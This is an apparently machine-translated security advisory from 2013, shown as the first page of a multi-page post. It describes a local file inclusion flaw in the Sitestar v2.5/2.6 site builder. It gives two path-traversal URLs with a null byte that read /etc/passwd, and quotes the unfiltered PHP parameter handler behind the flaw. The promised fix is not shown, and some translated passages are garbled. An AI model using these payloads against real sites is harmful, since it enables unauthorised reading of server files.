The establishment of the station star sitestar v2. 5 the file that contains the exploit and fix-vulnerability warning-the black bar safety net

2013-05-13T00:00:00
ID MYHACK58:62201338739
Type myhack58
Reporter 佚名
Modified 2013-05-13T00:00:00

Description

Inadvertently found that the establishment of the station star sitestar a tasteless file contains vulnerabilities, WVS scan a friends website, find the prompt with the following file include vulnerability

index. php? _a=fullist&_m=../../../../../../../../../../etc/passwd%00.jpg

admin/index. php? _a=admin_list&_m=../../../../../../../../../../etc/passwd%00.jpg

Test the modified vulnerability affects version has the establishment of the station star sitestar v2. 5, the sitestar v2. 6

To view the index. php file, code is as follows:

<? php define(‘IN_CONTEXT’, 1); the include_once(‘load.php’); ?& gt;

继续 跟进 load.php, variable _m relevant statement is as follows:

$act =& ParamHolder::get(‘_m’); switch ($act) { case ‘mod_order’: the include_once(P_INC.’/ china_ds_data.php’); break; case ‘mod_auth’: case ‘mod_message’: the include_once(P_LIB.’/ rand_math.php’); break; }

Continue to follow ParamHolder::get is how to achieve, 具体漏洞文件是在library\param.php that code is as follows:

1 9 3 class ParamHolder { 1 9 4 / 1 9 5 * Retrieve parameter 1 9 6 * 1 9 7 * @access public 1 9 8 * @static 1 9 9 * @param string $key_path The context path for retrieving data 2 0 0 * @param mixed $value The default data as fallback 2 0 1 * @param int $scope The parameter context 2 0 2 * @return mixed 2 0 3 */ 2 0 4 public static function &get($key_path, $default = false, $scope = PS_ALL) { 2 0 5 switch ($scope) { 2 0 6 case PS_GET: 2 0 7 $rs =& ParamParser::retrive($_GET, $key_path, $default); //the input variable$_GET may be a security threat 2 0 8 break; 2 0 9 case PS_POST: 2 1 0 $rs =& ParamParser::retrive($_POST, $key_path, $default); //the input variable$_POST there may be a security threat 2 1 1 break; 2 1 2 case PS_COOKIE: 2 1 3 $rs =& ParamParser::retrive($_COOKIE, $key_path, $default); //the input variable$_COOKIE there may be a security threat 2 1 4 break; 2 1 5 case PS_FILES: 2 1 6 $rs =& ParamParser::retrive($_FILES, $key_path, $default); //the input variable$_FILES may be a security threat 2 1 7 / 2 1 8 * get upload file type 2 1 9 */ 2 2 0 if (isset($rs["tmp_name"]) && ! is_array($rs["tmp_name"]) && ! empty($rs["tmp_name"])) { 2 2 1 $ftype = ParamParser::file_type($rs["tmp_name"]); 2 2 2 if ($ftype == ‘unknown’) die(__(‘Upload file type error,please retry!’)); 2 2 3 } 2 2 4 break; 2 2 5 case PS_MANUAL: 2 2 6 $rs =& ManualParamHolder::get($key_path, $default); 2 2 7 break; 2 2 8 case PS_ALL: 2 2 9 if (ParamParser::has($_GET, $key_path)) { //the input variable$_GET may be a security threat 2 3 0 $rs =& ParamParser::retrive($_GET, $key_path, $default); //the input variable$_GET may be a security threat 2 3 1 } else if (ParamParser::has($_POST, $key_path)) { //input variables$_POST there may be a security threat 2 3 2 $rs =& ParamParser::retrive($_POST, $key_path, $default); //the input variable$_POST there may be a security threat 2 3 3 } else if (ParamParser::has($_COOKIE, $key_path)) { //input variables$_COOKIE there may be a security threat 2 3 4 $rs =& ParamParser::retrive($_COOKIE, $key_path, $default); //the input variable$_COOKIE there may be a security threat 2 3 5 } else if (ParamParser::has($_FILES, $key_path)) { //input variables$_FILES may be a security threat 2 3 6 $rs =& ParamParser::retrive($_FILES, $key_path, $default); //the input variable$_FILES may be a security threat 2 3 7 } else if (ManualParamHolder::has($key_path)) { 2 3 8 $rs =& ManualParamHolder::get($key_path, $default); 2 3 9 } else { 2 4 0 $rs = $default; 2 4 1 } 2 4 2 break; 2 4 3 default: 2 4 4 $rs = $default; 2 4 5 } 2 4 6 return $rs; 2 4 7 } 2 4 8 }

You can see the NO of input variables to do any filtering judgment, causes local include vulnerability.

[1] [2] next